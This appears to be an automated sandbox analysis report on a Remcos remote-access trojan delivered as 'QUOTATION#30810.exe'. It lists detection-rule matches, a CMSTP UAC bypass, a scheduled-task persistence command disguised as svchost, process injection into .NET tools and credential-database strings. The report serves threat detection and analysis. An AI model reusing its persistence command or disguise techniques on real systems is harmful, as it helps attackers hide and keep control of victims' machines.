                        Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: QUOTATION#30810.exe, ------.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                        Source: svchost.exe.0.dr, ------.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                        Source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                        Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@77/31@1/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,32_2_004182CE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,26_2_00417952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,39_2_00410DE1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,45_2_00417952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,32_2_00418758
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,26_2_0040F474
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,26_2_0041B4A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_0041AA4A
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6908
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2772
                        Source: C:\Windows\System32\cmstp.exeMutant created: \Sessions\1\BaseNamedObjects\Connection Manager Profile Installer Mutex
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5864
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDAAA.tmpJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""
                        Source: QUOTATION#30810.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: QUOTATION#30810.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem information queried: HandleInformation
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmstp.exe")
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: vbc.exe, vbc.exe, 00000025.00000002.1820823385.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: vbc.exe, 00000020.00000002.1860721293.00000000070C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: QUOTATION#30810.exeReversingLabs: Detection: 57%
                        Source: QUOTATION#30810.exeVirustotal: Detection: 48%
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile read: C:\Users\user\Desktop\QUOTATION#30810.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                        Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION#30810.exe "C:\Users\user\Desktop\QUOTATION#30810.exe"
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
